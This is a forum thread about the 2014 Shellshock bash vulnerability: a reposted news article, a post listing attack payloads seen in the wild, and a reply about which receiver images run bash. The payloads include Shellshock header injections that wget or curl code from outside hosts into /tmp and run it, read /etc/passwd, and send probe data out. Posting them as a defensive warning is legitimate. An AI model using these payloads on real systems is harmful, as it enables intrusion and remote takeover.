What's new

Techie's Lounge 'Bash' command flaw leaves Linux, OS X and more open to attack

False Prophet

Busted P/S
Member
Messages
0
Joined
Sep 21, 2014
Reaction score
10
Points
0
Apparently, the internet has more deep-seated security bugs to worry about than Heartbleed. Researchers have discovered a longstanding flaw in a common Unix command shell (bash) for Linux and Macs that lets attackers run any code they want as soon as the shell starts running. They can effectively get control of any networked device that runs bash, even if there are limits on the commands remote users can try. That's a big problem when a large chunk of the internet relies on the shell for everyday tasks -- many web servers will call on it when they're running scripts, for example.

Shellshock flaw in Terminal on a Mac

Apparently, the internet has more deep-seated security bugs to worry about than Heartbleed. Researchers have discovered a longstanding flaw in a common Unix command shell (bash) for Linux and Macs that lets attackers run any code they want as soon as the shell starts running. They can effectively get control of any networked device that runs bash, even if there are limits on the commands remote users can try. That's a big problem when a large chunk of the internet relies on the shell for everyday tasks -- many web servers will call on it when they're running scripts, for example.

There are already patches for multiple Linux variants (CentOS, Debian, Redhat), and big internet services like Akamai have already taken action. However, the age and sheer ubiquity of the exploit means that there are some older servers and other internet-connected devices that won't (and in some cases, can't) be fixed. In other words, there's a chance that everything from poorly maintained websites to your home security camera will remain vulnerable. Some devices will be protected, however, as security researcher Paul McMillan notes that many embedded devices "use BusyBox, which is not vulnerable." It's unlikely that hackers will breach many of the major sites you visit thanks to their quick responses to the flaw, and many of your existing gadgets are probably safe. Having said this, it's hard to know exactly how far reaching the damage may be -- it could take years before there's no longer a significant threat.
 

False Prophet

Busted P/S
Member
Messages
0
Joined
Sep 21, 2014
Reaction score
10
Points
0
at the end of ShellShocker Day 1 we are seeing thousands of requests to different web sites attempting all types of exploits.

From attackers trying to set up remote shells:

"() { :; }; /bin/bash -c \x22if [ $(/bin/uname -m | /bin/grep 64) ];
then /usr/bin/wget 82.118.242.223:5487/v64 -O /tmp/.osock; else /usr/bin/wget 82.118.242.223:5487/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &\x22" "PROXYBLOCKID:" "

To the configuration of IRC bots:

() { :;}; /bin/bash -c \x22cd /tmp;curl -O
Please, Log in or Register to view URLs content!
; perl /tmp/jur;rm -rf /tmp/jur\x22"

All being crammed inside the user agent, referrer and other HTTP headers. We are also seeing a lot of discovery still going on, like these attempts:

() { ignored;};/usr/bin/wget 176.99.6.189:3128/site.com"

() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

() { :; }; /bin/cat /etc/passwd > /tmp/d1.txt"

() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"

() { :; }; ping -c 17 209.126.230.74" "() { :; }; ping -c 17 209.126.230.74"

() { :;}; /bin/bash -c \x22/usr/bin/wget
Please, Log in or Register to view URLs content!
-O /tmp/a.pl\x22"

() { :;}; echo; /usr/bin/id" "https://shellshock.detectify.com"

() { :;}; /usr/bin/env curl -s
Please, Log in or Register to view URLs content!
> /dev/null" "() { :;}; /usr/bin
/env curl -s
Please, Log in or Register to view URLs content!
> /dev/null"

() { :;}; /bin/env curl -s
Please, Log in or Register to view URLs content!
> /dev/nu
ll"

() { :;}; /bin/bash -c \x22wget http://psicologoweb.net/mc/s.php/site.com\x22"

() { :;}; wget http://shellshock.brandonpotter.com/report/site/Referer"

() { :; }; curl http://vk.websecurelogin.com/b/?url=websiterecord.com/dm/xar.sh"

() { test;};/usr/bin/wget
Please, Log in or Register to view URLs content!
-O ~/cgi-bin/APM.mp3"

And even via email:

() { :; }; mail -s \x22Your files\x22 mailXXXtest@gmail.com


The most targeted URLs have been:

/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv


Patch up your systems, This includes all Linux/Unix based variants, MacOS, all linux based satellite receivers!
 

Pheonix

VIX Team Member
Member
Messages
51
Joined
Sep 28, 2014
Reaction score
8
Points
8
The standard Pli and ViX images are not vulnerable to this as they do not run bash, unless you install it manually. That said I did see on a american forum that OpenATV and Openspa are vulnerable, there may be more but hopefully they start patching their images or remove bash from them all together.
 
Top Bottom